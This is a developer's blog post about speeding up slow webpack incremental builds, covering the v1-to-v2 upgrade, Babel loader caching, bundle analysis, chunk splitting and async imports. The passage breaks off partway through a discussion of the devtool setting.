Prior language editions brought developers the concept of creating an object and initializing its values at the same time. (See “Object Initializers” later in this chapter.) However, you could not initialize objects that used indexes. Instead, you had to add one value after another, making your code repetitive and hard to read. C# 6.0 supports index initializers. The following shows an example of creating a Dictionary<string, DateTime> object of key/value pairs and initializing values at the same time.
C#
var holidays = new Dictionary<string, DateTime> { { "New Years", new DateTime(2015, 1, 1) }, { "Independence Day", new DateTime(2015, 7, 4) } }; | http://www.informit.com/articles/article.aspx?p=2431727 | CC-MAIN-2017-04 | refinedweb | 1,819 | 57.67 |
tag:blogger.com,1999:blog-8712770457197348465.post7584728779079728866..comments2014-12-17T22:36:41.987-08:00Comments on Javarevisited: How SubString method works in Java - Memory Leak Fixed in JDK 1.7Javin Paul, As you just wrote In case If you have still n...Hi, As you just wrote<br /><br /.<br /><br />I can not understand. Because I think the new string created by substring andy guys, this is Uma. Think this is not quite cor..) [email protected]:blogger.com,1999:blog-8712770457197348465.post-50415943072507206492014-05-04T04:59:56.070-07:002014-05-04T04:59:56.070-07:00U have mentioned above that " This will also ... U have mentioned above that " This will also stop original string to be garbage collected, in case if doesn't have any live reference.". can you please elaborate it more. I didn't understood [email protected]:blogger.com,1999:blog-8712770457197348465.post-83337443044354836692013-12-11T09:28:09.154-08:002013-12-11T09:28:09.154-08:00SubString will always create a new object, but. [email protected]:blogger.com,1999:blog-8712770457197348465.post-74583874372414414252013-10-20T07:52:07.419-07:002013-10-20T07:52:07.419-07:00Hi, while debugging we can see that even after su...Hi,<br /><br />while debugging we can see that even after substring it had all the content in the backing array.<br />so if we don't want to keep the same we can use <br /> <br />String new2 = new String(new1.toCharArray());<br /><br />this will copy the actual array to the backing array.<br />I am not sure about what will happen to String 'new1' with data 1 GB.<br /><br />Thanks,<br Soumitra Pathak Javin, I've been reading your articles an...Hey Javin,<br /><br />I've been reading your articles and although they are very helpful. This article does have much content on the topic of sub-string and whatever it does have is quite confusing. Which actually goes for a lot of your articles.<br /><br />On reading this i was under the impression that a brand new string gets created when substring method is called and because of memory [email protected]:blogger.com,1999:blog-8712770457197348465.post-53032923861619563862013-08-15T20:40:08.912-07:002013-08-15T20:40:08.912-07:00Indeed substring in Java will not create any more .. [email protected]:blogger.com,1999:blog-8712770457197348465.post-82630448402123801382013-06-27T08:46:11.187-07:002013-06-27T08:46:11.187-07:00@javin, can you please move the update note at the...@javin, can you please move the update note at the top of the article? I fear that readers who will only scan this article will be misinformed.<br /><br /> - [email protected]:blogger.com,1999:blog-8712770457197348465.post-82858338765779285462013-06-06T20:06:37.253-07:002013-06-06T20:06:37.253-07:00how to search for a given pattern in a string with...how to search for a given pattern in a string without using regex?<br />e.g.<br />search "aab" total no of occurances and the index at which this pattern in string "aabcbbacbaabaaaabbabaab"[email protected]:blogger.com,1999:blog-8712770457197348465.post-21493209653311016582013-03-09T17:25:19.712-08:002013-03-09T17:25:19.712-08:00@Anonymous, What is your questions? isn't you ...@Anonymous, What is your questions? isn't you answering your own question, if I understood correctly, in "emptiness".substring(9) returns "" (an empty string)Javin @ BlockingQueue in Java it really true? "no it won't throw Ind...Is it really true? "no it won't throw Index OutOfBoundException instead it will return empty String, same is the case when beginIndex and endIndex is same in case of second method." <br /><br />Source -<br />"<br />substring<br /><br />public String substring(int beginIndex)<br />Returns a new string [email protected]:blogger.com,1999:blog-8712770457197348465.post-48296940404433033442013-03-07T03:22:44.660-08:002013-03-07T03:22:44.660-08:00@Yves Gillet, you are correct mate, It seems, subs...@Yves Gillet, you are correct mate, It seems, substring method is now free from memory leak. Will update this post. ThanksJavin @ Java Classloder Working you are referring to the substring problem wa...what you are referring to the substring problem was in fact a bug:<br /><br /><br />I hope interviewers are at least aware that some of their questions are not valid anymore :)Yves Gillet beware the implementation changed since java 7...Yea beware the implementation changed since java 7 at least, the substring no longer backs up the original char[] array, it creates a new copy of it. Please reflect this in you article.Yves Gillet I don't understand is how this 1G array [email protected]:blogger.com,1999:blog-8712770457197348465.post-18264076344315334582013-01-24T13:22:58.595-08:002013-01-24T13:22:58.595-08:00The String(String) constructor has changed between...The String(String) constructor has changed between Java 6, 7, and (the early access version of) 8. That bit about stripping out the baggage is no longer in there.<br /><br />What you need to do, if your small sub-string of a large string is in variable "name", is:<br /><br />name = new String(name.toCharArray());Dave Conrad was asked exactly this question in a Google tele...I was asked exactly this question in a Google telephone interview. Of course, I failed the last part which assumed that I knew how substring is implemented internally.<br /><br />When my reviewer mentioned this implementation, I told him that this is definitely implementation-dependant and that other JVMs should behave differently.<br /><br />In the end, I passed that interview.papajohn: No array contents are copied. Several St....<br /><br />What I assume the interviewer was aiming towards was what [email protected]:blogger.com,1999:blog-8712770457197348465.post-77643212317759781312012-06-14T00:05:25.409-07:002012-06-14T00:05:25.409-07:00Regarding the first comment related to "retur..Apoorv, I read your article and i cant able to unders...Hi,<br /><br /. <br /><br /><br /><br />Can you give more [email protected]:blogger.com,1999:blog-8712770457197348465.post-85504163170388373912012-03-22T00:06:14.334-07:002012-03-22T00:06:14.334-07:00I understand how substring works in Java but what ...I understand how substring works in Java but what is point of keeping original character array inside substring object ? Since string is immutable you can not change a String once created and SubString are [email protected]:blogger.com,1999:blog-8712770457197348465.post-663810376678173752011-10-10T06:00:03.931-07:002011-10-10T06:00:03.931-07:00In the substring method of String class, the code ...In the substring method of String class, the code is as follows:<br /><br />return ((beginIndex == 0) && (endIndex == count)) ? this : new String(offset + beginIndex, endIndex - beginIndex, value);<br /><br /><br />The code is returning a new String object which contains the same backing array. As the array is an object reference, the two string objects will be pointing to the same [email protected] | http://javarevisited.blogspot.com/feeds/7584728779079728866/comments/default | CC-MAIN-2014-52 | refinedweb | 1,187 | 58.79 |
Visual Studion some help please
I want to know if visual studion can open existing script
can I open Superman script for exemple , to look what is inside ?
I just want to know how its build and i would like to use the laser eyes, for my self.
@Necroxide You cannot view the code of compiled scripts in VS. You would have to use a decompiler to get the source code.
@Jitnaught Hex editing would probably work... but that's usually dangerous.
@krashadam Hex editing would work for editing simple things, but to view the source code it's not a good option.
dotPeek is a .NET decompiler which can decompile code back to semi-recognizable code. It's a good idea to use a decimal->hex converter to get back the natives they call.
For .asi scripts and obfuscated .NET scripts you're gonna have to do some more work but maybe other people know what's to be done.
@ikt I would recommend dnSpy. It's basically ILSpy (good source code decompiler) + dotPeek (good UI, debugging, decompile to project, etc). It's also made so it can handle obfuscated assemblies (better). And it's open-source
To get the natives scripts call just make sure ScriptHookVDotNet.dll is in the same folder as the script you're decompiling. dnSpy will automatically get the native names from there.
@JitnaughtThanx
it helped a lot i'm new to this ,
it worked but there is a specification that visual studio see the 29AAA / B8AAA type of names as errors,do you know what that is ? or its a mistake in the transformation of the files ?
using GTA;
using System;
using System.Collections.Generic;
using System.Windows.Forms;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.IO;
using System.Drawing;
using GTA.Math;
using GTA.Native;
namespace CyclopsMOD
{
public class CyclopsMOD : Script
{
public CyclopsMOD() { Tick += Ontick; KeyDown += OnKeyDown; KeyUp += OnkeyUp; Interval = 8; } void Ontick(object sender, EventArgs e) { } void OnKeyDown(object sender, KeyEventArgs e) { } void OnkeyUp(object sender, KeyEventArgs e) { if (e.KeyCode == Keys.I) { this.29AAA = World.CreateProp(this.09AAA.Model, THelper.getCreationPos(15.0, 15.0), false, false); Script.Wait(0); flag = !THelper.Exists(this.29AAA); if (!flag) { this.29AAA = CyclopsMOD.C30A1[0]; CyclopsMOD.C30A1.RemoveAt(0); } else { this.29AAA.IsVisible = false; this.29AAA.AttachTo(Game.Player.Character,110A1, 0, Game.Player.Character, 110A1.GetOffsetFromWorldCoords(this,88AAA), Vector3.Zero); Vector3 vector = THelper.directionToRotation(Vector3.Normalize(this,09AAA.GetOffsetInWorldCoords(Vector3.RelativeRight) - this,09AAA.GetOffsetInWorldCoords(Vector3.Zero)), 0.0); Vector3 vector2; vector2.ctor(-2.8f, 0f, 3f); Vector3 rot = vector + vector2; this.98AA1 = THelper.RotationToDirection(rot); Cyclops.B30AA.Add(this); double size = 0.08; this.B8AAA.Add(THelper.ptfx_startOnEntity(this,29AAA, "proj_laser_player", "core", Vector3.Zero, Vector3.Zero, size,, 0.25,, size, 1.0)); THelper.ptfx_setColor(this.B8AAA[this.B8AAA.Count - 1], 0.0, 255.0, 0.0); this.C8AA1 = DateAndTime.Now;
- its just a copy of the super man script past in my script creation ... im trying to find the ''animation'' light effect and stuff and the 'impacte' affect on ped ect..
You must be missing a variable. | https://forums.gta5-mods.com/topic/15670/visual-studion-some-help-please | CC-MAIN-2017-47 | refinedweb | 517 | 53.58 |
TypeName
IdentifiersShouldNotMatchKeywords
CheckId
CA1716
Category
Microsoft.Naming
Breaking Change
Breaking
A namespace name or a type name matches a reserved keyword in a case-insensitive comparison.
Identifiers for namespaces and types should not match keywords defined by languages that target the common language runtime. Depending on the language in use and the keyword, compiler errors and ambiguities can make the library difficult to use. This rule does not check all keywords in all .NET languages.
Select a name that does not appear in the list of keywords.
Do not exclude a warning from this rule. The library might not be usable in all available languages in the .NET Framework.
This rule currently checks against the keywords of Visual Basic, C#, Managed C++, C++/CLI and J# languages.
A case-insensitive comparision is used for Visual Basic keywords and case-sensitive comparision for the other languages. | http://msdn.microsoft.com/en-us/library/ms182248(VS.80).aspx | crawl-002 | refinedweb | 145 | 57.27 |
.NET Core 1.0 Release — What You Need to Know to Get Started
Wondering what the new .NET Core release has in store for you? Let's take a look...
Join the DZone community and get the full member experience.Join For Free
With the recent release of .NET Core 1.0 and the corresponding MVC framework update for it, many of you may be interested in migrating existing web projects or starting a greenfields one with it. What will soon become apparent is that it’s a pretty huge overhaul and different in many places from MVC 5.
In general, it brings fresh ideas and tooling from the open source world (especially NodeJS) to the Microsoft ecosystem. It’s a fast and intuitive framework that mostly just works (once you figure out the differences.) Aside from the tooling refresh, the fact that it targets all platforms is a win and worth a look for all developers, no matter what ecosystem they hail from.
The fact that C# and the CLR can now be developed on OS X and deployed to Linux is pretty sweet. It’s worth remembering that the new .NET Core 1.0 release is a large change and is quite different. Some old ways will need to be relearned at first, so it’s worth noting how the initial commit of a new .NET Core 1.0 project might look compared to the past.
Setting Up as Local Development Site
.NET Core uses its web server, Kestrel, to serve up CLR code. We are using the traditional IIS workflow to forward requests through to Kestrel. In order for IIS to handle HTTP requests to your .NET Core app code, you’ll need to install the .NET Core Windows Server Hosting bundle. This contains the ASP.NET Core Module and creates a reverse proxy between IIS and the Kestrel server.
Create a Local Dev Website in IIS Like Normal:
- Hit Win+R, open ‘inetmgr’, then right-click Sites -> Add Website.
- Add a site name e.g sample.local and set its physical path to your project’s folder (the one with
web.configin it). Set the host name to a domain such as sample.local.
- Add the above domain to your HOSTS file, pointing it at 127.0.0.1.
The Publishing to IIS documentation is quite useful as it lists all the steps involved. In particular, check out the ‘Common Errors’ section as there are a few possible failure states depending on what you have installed or built, it will also highlight whether or not the various moving parts can locate what they need.
In particular, to debug the config, you’ll want to check these two:
- Enable stdout logging: create a
log/directory in your project root (where web.config is), and set
stdoutLogEnabledto
truein the web.config
- Check the Event Viewer: Win+R -> eventvwr then look under Applications.
There is one additional step which involves ‘Publishing’ the project to generate the assemblies alongside the app code. You can set this target folder to one outside the project, or within it and point Kestrel at the release folder. Then, you only need to right-click on the project in VS once and click ‘Publish’, setting its Target Location to File System and
.\bin\Release\PublishOutput. You can then develop your site in VS. Changes will be reflected upon save, as normal.
After you’ve published your site point, finally the
aspNetCore element in web.config at that location. Your line should look something like this:
<aspNetCore processPath="dotnet" arguments=".\bin\release\publishoutput\SampleApp.dll" stdoutLogEnabled="true" stdoutLogFile=".\logs\stdout" forwardWindowsAuthToken="false" />
.\SampleApp.dllor if it’s a standalone .exe leave it blank.
Finally, run up your domain in a web browser, and start developing! The following is a series of common web development tasks that need to be set up in a new project. They will help you get up to speed with .NET Core 1.0.
Common Client-Side Tasks
Serving Static Content
The default projects have static assets (JS/CSS/images) wired up and ready for routing straight out the box. These now reside in wwwroot/ by default, beneath your project directory. Using the Gulp or Grunt plugins to rebuild the assets is the easiest way to develop these. Have them updated upon file saves, either using a file watch or the Task Runner Explorer. The project templates or Yeoman can include these config files (such as
yo aspnet --gulp). Here’s how to set up the workflow from scratch:
- Add the NPM package.json and gulpfile.js or Gruntfile using Add New Item in the Solution Explorer.
- Open up Task Runner Explorer by right-clicking on the Gulp or Grunt config file, then clicking Run on the selected task.
- Add the particular dependencies for Gulp/Grunt.
The project defaults to pointing at the site.css/site.js files if the environment is
Development, or site.css.min/site.js.min if it’s
Staging or
Production (case-insensitive). If the environment is pointing at either of the latter two you’ll need to run the Minify tasks with or Gulp/Grunt to update the client-side assets. If you’re pointed at dev the assets will update in place.
There are a couple of ways to set the development environment. If you’re running Kestrel from VS, you can set it by right-clicking on the project in VS then going to Debug and setting the ASPNETCORE_ENVIRONMENT value. Alternatively, you can set the same in Properties -> launchSettings.json. If you’re running it in IIS and want to set it in the web.config, you can do this like so:
<aspNetCore ...> <environmentVariables> <environmentVariable name="ASPNETCORE_ENVIRONMENT" value="Development" /> </environmentVariables> </aspNetCore>
app.UseStaticFiles();is present in the Startup.Configure method. There are also richer alternatives available including UseFileServer which enables directory browsing (not by default as it’s a security hole).
Bundling Client-Side Assets in .NET Core 1.0
Once you’ve got one of the above client-side task runners set up, traditional bundling and minification is available using their standard pipelines such as gulp-concat and UglifyJS2 (called using its wrapper libraries). Excellent documentation for this is available here. If you’re up for the more cutting edge client-side package management like Webpack, continue on with the next section.
Client-Side Package Management With Webpack
A more cutting edge approach to the above for development is available. One popularized and especially useful with React applications is Webpack. A NuGet package is available here that supports this from .NET Core 1.0. This gets a development server for Hot Reload for rapid iteration of modules and pages – when code is updated and saved, the changes are immediately reflected in the browser without a static page load.
Webpack is powerful and also provides the ability for production bundles to use async loading of dependencies when they’re needed (‘Hot Reload’ is the killer feature for me).
Common Server-Side Tasks
URL Routing
Fortunately, the URL routing in .NET Core MVC isn’t very different from MVC 5. The declarative catch-all routes are now specified in Startup.cs with the
app.UseMvc() lambda function. The default Controller and Action method routing thus works out of the box as before.
The upshot of this is bog-standard MVC – a FooController that inherits from Controller, with a Bar method that returns an ActionResult and a View(). This will load the view located in
Views\Foo\Bar.cshtml when /foo/bar is requested by a user agent.
Attribute routing is also supported. The following method will return when ‘/baz’ is requested:
public class FooController : Controller { [Route("/baz")] public ActionResult Bar() { return View(); } }
Areas
Area folders work as before, too, so you can group up related Controllers and Views into sections. For instance when using the default route mapping you can add areas like this:
app.UseMvc(routes => { routes.MapRoute( name: "default", template: "{area=Home}/{controller=Home}/{action=Index}/{id?}"); });
Logging
The ILoggerFactory that gets passed in to Startup.Configure lets you configure the available logger targets and the verbosity level (with LogLevel) etc.
To log out messages you then accept an instance of ILogger where T is the instantiating class type. Storing this in an instance variable then lets you call
_logger.LogDebug() and similar.
Rendering Partials
Since the update, if you attempt to render a Partial view from a Razor view with
@Html.RenderPartial it chokes. The syntax has changed slightly and the async-await everywhere API appears to be preferred. The following syntax works correctly instead:
@{await Html.RenderPartialAsync("Partial");}
It’s Over!
We hoped you found this post useful and enjoy looking into .NET Core 1.0. Add Raygun Crash Reporting and Pulse to your site after you’ve got everything up to make sure things run smoothly. Install the NuGet package Mindscape.Raygun4Net.AspNetCore in Visual Studio by right-clicking on your project -> Manage NuGet Packages.
Have questions on the .NET Core 1.0 release and what it means for you? Share your comments!
Published at DZone with permission of , DZone MVB. See the original article here.
Opinions expressed by DZone contributors are their own. | https://dzone.com/articles/net-core-10-release-what-you-need-to-know-to-get-s | CC-MAIN-2022-27 | refinedweb | 1,534 | 68.06 |
Products and Services
Downloads
Store
Support
Education
Partners
About
Oracle Technology Network
Name: krC82822 Date: 06/25/2001
java version "1.4.0-beta"
Java(TM) 2 Runtime Environment, Standard Edition (build 1.4.0-beta-b65)
Java HotSpot(TM) Client VM (build 1.4.0-beta-b65, mixed mode)
The design of the classes related to the new persistence delegation
seems counterproductive and does not match specification at
some points. Some methods have undocumented side effects.
The Encoder class is intended to be a base class for different
Encoder implementations but is mostly designed as if it should never
be subclassed and implemented as if XMLEncoder was the only possible
subclass and if it were a singleton design.
Most important points are:
- Encoder should be abstract
- Encoder should provide abstract methods for the implementors
e.g., a method which is called after writeStatement has
processed it and has created the nessessary expressions
-
- getPersistenceDelegate and setPersistenceDelegate are instance
methods but have static effect. These should be either static methods
or have an effect per instance
- getValue(Expression) should be protected not package-private
- clear() should be protected not package-private
- XMLEncoder should not call any package-private methods.
Then it would better match it's role of a reference
implementation of an Encoder and the design flaws would
be detected earlier
- The constructor of XMLEncoder has global side-effects.
BTW the called static method setCaching(boolean) is replacing the cache
by a new HashMap every time it is set to true, even if it was true before
- The flush() method of XMLEncoder has global side-effects
- The toString() method of Statement has global side-effects.
- if other Encoder implementations are using the toString() method of
Statement the target objects are never garbage-collected
- There might be more side-effects
It seems as if the whole code should be better completly rewritten.
The following code can be used to indicate some of the above points.
import java.lang.reflect.*;
import java.beans.*;
import java.io.ByteArrayOutputStream;
import java.util.HashMap;
class TestCase {
static void main(String[] arg) {
try {
System.out.print("Is getPersistenceDelegate DECLARED static ? ");
Class[] argType=new Class[] {Class.class};
Method m=Encoder.class.getMethod("getPersistenceDelegate",argType);
System.out.println(Modifier.isStatic(m.getModifiers()));
System.out.print("Is the EFFECT of set/getPersistenceDelegate static ? ");
Encoder e1=new XMLEncoder(new ByteArrayOutputStream()),
e2=new XMLEncoder(new ByteArrayOutputStream());
PersistenceDelegate pd=new DefaultPersistenceDelegate();
e1.setPersistenceDelegate(TestCase.class, pd);
System.out.println(e2.getPersistenceDelegate(TestCase.class)==pd);
System.out.println("Writing an object to a debug Encoder");
e1=new Encoder() {
public void writeExpression(Expression ex) {
super.writeExpression(ex);
System.out.println(" Expression: "+ex);
}
};
Object testObj=new java.awt.Point(4,2);
e1.getPersistenceDelegate(testObj.getClass()).writeObject(testObj,e1);
System.out.print("now, are there DANGLING REFERENCES avoiding gc ? ");
Class nameCl=Class.forName("java.beans.NameGenerator");
Field nameFd=nameCl.getDeclaredField("valueToName");
nameFd.setAccessible(true);
HashMap names=(HashMap)nameFd.get(null);
System.out.println(!names.isEmpty());
System.out.println(" "+names.size()+" objects");
if(!names.isEmpty()) {
System.out.print("Does XMLEncoder.flush() have a GLOBAL SIDE-EFFECT"
+" to these references ? ");
((XMLEncoder)e2).flush();
HashMap names2=(HashMap)nameFd.get(null);
System.out.println(!names2.equals(names));
System.out.println(" "+(names2.isEmpty()?"now":"still")
+" contains "+names2.size()+" objects");
}
}
catch(Exception ex) {
System.out.println("\nException occured: "+ex);
System.out.println("Note that this TestCase is specific to version "
+"1.4.0-beta-b65");
}
}
}
(Review ID: 127273)
======================================================================
EVALUATION
Response from Philip Milne follows:
> The Encoder class is intended to be a base class for different
> Encoder implementations but is mostly designed as if it should never
> be subclassed and implemented as if XMLEncoder was the only possible
> subclass and if it were a singleton design.
>
This is a little harsh, the Encoder can in fact be trivially subclassed
to produce a textual (Java-like) output. Granted however, some package
private methods make it very difficult to override some of its features.
Where the problems are a question of exposing methods that are currently
hidden this will probably happen, though it is too late for changes
that are not backward compatible. Its a shame we didn't have you on the
expert group when you could have raised these issues while the design was
taking place last year.
Anyway, to answer your points:
> Most important points are:
>
> - Encoder should be abstract
I'm actually not sure this is better, but its too late for
this anyway as this would break people.
> - Encoder should provide abstract methods for the implementors
> e.g., a method which is called after writeStatement has
> processed it and has created the nessessary expressions
As above.
> -
Well, although I wouldn't claim the design is perfect, there is
some method to this madness. The Encoder does actually have all the
state it needs to emit a stream of expressions and statements which
will produce the object graph. The XMLEncoder is performing an inherently
more complicated task. It is the structure of the XML and the fact that
expressions are nested in lexical blocks with all operations on an
instance done in one place that requires the extra data structures.
In particular, deciding whether am object needs an explicit ID is
quite difficult to calculate from the graph and requires access to
the all the state which is found in the XMLEncoder.
> - getPersistenceDelegate and setPersistenceDelegate are instance
> methods but have static effect. These should be either
> static methods
> or have an effect per instance
Yes, this has been reported as a problem a few times already.
There is a fundamental mismatch here, between the idioms which
the Encoder/Decoder take from the IO package and from the rest
of the beans specification. Basically, a the IO package introduces
the idea of streams which have state - and so we attached the
delegates that we use for controlling persistence to the stream so
that we would be able to support different configurations of encoders
at the same time at some point in the future. Had we made them static
this would never have been possible.
The beans spec and, in particular, the Introspector attach BeanInfo
to classes and this is an inherently static idea. After worrying about
this for some time I made the methods instance methods because
that left us greatest room for expansion in the future and allowed
them to be subclassed. As you have rightly pointed out they currently
affect static data structures in the MetaData class and this is
very confusing. The structures could be made instance specific though
there is always going to be a mismatch between this and BeanInfo
which is, and always will be, a static concept.
> - getValue(Expression) should be protected not package-private
> - clear() should be protected not package-private
Yes this is a good point though once methods are exposed they
can never be deleted; even deprecating methods is pretty difficult
to do in organisations which create public libraries. Given this,
I erred on the side of caution with the API and kept everything hidden
that could be hidden on the grounds that we could expose things if
people asked us to and not the other way around. You're right that
these methods should be made protected at some point at that was
always the intention.
> - XMLEncoder should not call any package-private methods.
> Then it would better match it's role of a reference
> implementation of an Encoder and the design flaws would
> be detected earlier
The XMLEncoder is not really intended to be a reference implementation
for the Encoder. The real purpose of the Encoder is to provide an
API which the persistence delegates can call - thereby isolating
the persistence delegates from the encoding. That it can be subclassed
to make other encoders is (or would be with the changes you suggest)
a useful thing but it is not the main reason for the class. FYI: There
were thoughts of making this class an interface for exactly the reason
above but interfaces cannot be extended over time - and that is the main
reason it is a class. Its API is important, not its implementation here.
That said, it does actually work if you instantiate it and implement the
write() methods using toString(). There's actually very little
(a couple of pages I think) in the Encoder implementation and so a
start-from-scratch implementation might be your best bet in the short
term.
> - The constructor of XMLEncoder has global side-effects.
Yes, though, once again, writing BeanInfo for a class has a global
effect.
> BTW the called static method setCaching(boolean) is replacing the
> cache
> by a new HashMap every time it is set to true, even if it was true
> before
Yes, though this happens rarely enough that it did not show up
at all in our performance tests.
> - The flush() method of XMLEncoder has global side-effects
True, in the NameGenerator. This should be fixed though it only
affects the toString() method which is there for debugging
purposes.
> - The toString() method of Statement has global side-effects
As above.
>.
Good point. I must admit I hadn't paid enough attention to the scenario
in which multiple streams are being used to write the same object graph
to different sinks. I think all of this can be fixed by making the
NameGenerator and co. instance specific thispart of the implementation
is all private.
> - if other Encoder implementations are using the toString()
> method of
> Statement the target objects are never garbage-collected
You mean because the flush method is package private? Yes, this
is also true.
> - There might be more side-effects
>
> It seems as if the whole code should be better completly rewritten.
>
As I say there is very little to the Encoder, most of the work is
in the XMLEncoder and that is there to support a format that you
obviously don't need. I would just do what you say, subclass the
Encoder override all the public methods and replace the two pages
or so of code there with your own implementation.
Its early days for this API and you are the first person I know
of to be trying to produce an entirely new format. If you'd
like to work with Mark to help get all of the features you need
exposed, so that others people would be able to use the API to
produce other formats more easily, then let him know. I expect, if
he has time, he'll try to get them in for FCS.
mark.davidson@Eng 2001-07-25
Many of the issues raised about multi threaded access to the static caches maintained in NameGenerator and Statement has been resolved as part of the fix for 4880633.
###@###.### 2003-09-22
WORK AROUND
Name: krC82822 Date: 06/25/2001
Do not use multiple XMLEncoder instances at the same time.
Do not create direct instances of Encoder as it makes no sense anyway.
Avoid using get/setPersistenceDelegate until their specification and
implementation match.
If you are implementing an Encoder I suggest using an intermediate class
in the inheritance hierarchy between Encoder and your implementation
which implements the features Encoder is missing and that are not really
specific to your implementation.
This way you can easily adapt your implementation to a future version of
Encoder which has the missing features.
Do not use Statement.toString() for other than debugging purposes. If
you are using custom Encoder implementations and want to make sure
that object references are cleared afterwards, create a XMLEncoder
instance and call it's flush() method.
====================================================================== | http://bugs.java.com/bugdatabase/view_bug.do?bug_id=4474171 | CC-MAIN-2014-35 | refinedweb | 1,916 | 52.39 |
Unpacking the Mysteries of Webpack -- A Novice's Journey
Slow incremental builds got you down? Let's figure it out together.
I'd worked on a handful of JavaScript applications with webpack before I inherited one in particular that had painfully sluggish builds. Even the incremental builds were taking up to 20 seconds...every single time I saved a change to a JS file. Being able to detect code changes and push them into my browser is a great feedback loop to have during development, but it kind of defeats the purpose when it takes so long.
What's more, as a compulsive saver and avid collector of Chrome tabs, I basically
lit my computer on fire as it screamed like an F-15 every time webpack ran one of
these builds. I put up with this for awhile because I was scared of webpack.
I shot a handful of awkward glances at
webpack.config.js over the course of
a few weeks. Right before permanent madness set in, I resolved to make things
better. Thus started my journey into webpack.
What are you, webpack?
First off, what exactly is this webpack and what does it do? Let's ask webpack:.
In development, webpack does an initial build and serves the resulting bundles to localhost. Then, as mentioned earlier, it will re-build every time it detects a change to a file that's in one of those bundles. That's our incremental build. webpack tries to be smart and efficient when building assets into bundles. I had suspicions that the webpack configuration on the project was the equivalent of tying a sack of bricks to its ankles.
First off, I had to figure out what exactly I was looking at inside my webpack
config. After a bit of Googling and a short jaunt over to my
package.json,
I discovered the project was using version 1.15.0 and the current version was
2.4.X. Usually newer is better -- and possibly faster as well -- so that's
where I decided to start.
Next stop, webpack documentation! I was delighted to find webpack's documentation included a migration guide for going from v1 to v2. Usually migration guides do one of two things:
- Make me realize how little I actually know about the thing and confuse me further.
Thankfully, upgrading webpack through the migration guide wasn't bad at all. It highlighted all the major configuration options I'd need to update and gave me just enough information to get it done without getting too in the weeds.
10/10, would upgrade again.
At this point, I had webpack 2 installed but I still had an incomplete understanding of what was actually in my config and how it was affecting any given webpack build. Fortunately, I work with a lot of smart, experienced Javascript developers that were able to point out a few critical pieces of configuration that needed attention. Focusing in on those, I started to learn more about what was going on under the hood as well as ways to speed things up without sacrificing build integrity. Before we get there though, let's take a pit stop and discuss terminology.
webpack, you talk funny.
As I was going through this process, I encountered a lot of terminology I hadn't run into before. In webpack land, saying something like "webpack dev server hot reloads my chunks" makes sense. It took some time to figure out what webpack terms like "loaders", "hot module replacement", and "chunks" meant.
Here are some simple explanations:
- Hot Module Replacement is the process by which webpack dev server watches your project directory for code changes and then automatically rebuilds and pushes the updated bundles to the browser.
- Loaders are file processors that run sequentially during a build.
- Chunks are a lower-level concept in webpack where code is organized into groups to optimize hot module replacement
Paul Sherman's post was helpful early on for giving me some perspective on webpack terminlogy outside of webpack's own documentation. I'd suggest checking both of them out.
Now that we all understand each other a little better, let's dig into some of the steps I took during my dive into webpack.
Babel and webpack
Babel is a Javascript compile tool that let's you utilize modern language features (like Javascript classes) when you're writing code while minimizing browser and browser-version support concerns. Coming from Ruby, I love so much about ES6 and ES7. Thanks Babel!
But wait, weren't we talking about webpack? Right. So Babel has a webpack
loader that will plug into the build process. In webpack 2, you use loaders
inside
rules in the top-level
module config setting. Here's a sizzlin'
example:
// webpack.config.js { module: { rules: [ { test: /\.jsx?$/, exclude: /node_modules/, loader: 'babel-loader', options: { cacheDirectory: '.babel-cache' } } ] } }
There are two particularly spicy bits in there that'll speed up your builds.
- Exclude
/node_modules/(directory and everything inside it) -- most libraries don't require you to run Babel over them in order for them to work. No need to burden Babel with extra parsing and compilation!
- Cache Babel's work -- turns out the Babel loader doesn't have to start from scratch every time. Add an arbitrary place for the Babel loader to keep a cache and you'll see build time improvements.
The speed, I can almost taste it. Let's not stop there though, because
Babel has its own config --
.babelrc that needs tending to. In particular,
when using the
es2015 preset for Babel, turning the modules setting to
false
sped up incremental build times:
// .babelrc { "presets": [ "react", ["es2015", { "modules": false }], "stage-2" ] }
Turns out that webpack is capable of handling
import statements itself and it
doesn't need Babel to do any extra work to help it figure out what to do.
Without turning the modules setting off, both webpack and Babel are trying to
handle modules.
Riding the Rainbow with Webpack Bundle Analyzer
While searching the interwebs for webpack optimization strategies, I stumbled
across
webpack-bundle-analyzer.
It's a plugin for webpack that will -- during build -- spin up a server that
opens a visual, interactive representation of the bundles generated by webpack
for the browser. Feast your eyes on the majestic peacock of the webpack
ecosystem!
So majestic. If you're like me, eventually you'd ask yourself, "But.. what does it mean!?". Got u fam.
Each colored section represents a bundle, visualizing its contents and their relative size. You're able to mouse over any of the files to get specifics on size and path. I didn't really know how to organize bundles and their contents, but I did notice a few things immediately based on the visual output of the analyzer:
- Stuff from
node_modulesin both bundles
- Big
.jsonfiles in the middle of
bundle.js
- A million things from
react-iconbloating
node_modulesinside my main
bundle.js. Ack! I'm sure
react-iconsis a great package, but are we really using hundreds of distinct icons? Not even close.
My next task was straightforward -- in concept -- but it took me awhile to figure out how to address each of those issues. Here's what I ended up with:
Thanks to the bundle analyzer, I learned some helpful things along the way. I'll step through the solutions to each of the problems I listed above.
Vendor Code Appearing in Multiple Bundles
Solution:
CommonsChunkPlugin
Using
CommonsChunkPlugin, I was able to extract all vendor code (files in
node_modules and manifest-related code (webpack boilerplate that helps the
browser handle its bundles) into their own bundles. Here's some of the related
config straight out of my
webpack.config.js:
{ plugins: [ new webpack.optimize.CommonsChunkPlugin({ name: 'vendor', minChunks: function(module) { return module.context && module.context.indexOf('node_modules') !== -1 } }), new webpack.optimize.CommonsChunkPlugin({ name: 'manifest' }) ] }
Big
.json Files in the Main Bundle
Solution: Asynchronous Imports
The app was only using the JSON files in a few React components. Rather than
using
import at the top of my React component files, I moved the
import
statements into the
componentWillMount function (lifecycle callback). When
webpack parses
import statements inside functions, it knows to separate those
files into their own bundles. The browser will download them as needed rather
than up front.
Unused Dependencies
Solution: Single File Imports
With
react-icons in particular, there are multiple ways to import icons.
Originally, the import statements looked like this:
import CloseIcon from 'react-icons/md/close'
react-icons also has a compiled folder (
./lib) where pre-built icon files can
be imported directly. Updating the import statements to use the icons from that
path eliminated the extra bloat:
`js
import CloseIcon from 'react-icons/lib/md/close'
`
That covers the things I learned from the bundle analyzer. To wrap up, I'll cover one other webpack config option that made a big difference.
Pick the Right
devtool
Last, and certainly not least, is the
devtool config setting
in webpack. The
devtool in webpack does the work of generating source maps.
There are a number of options that all approach source map generation differently,
making tradeoffs between build time and quality/accuracy. After trying out a
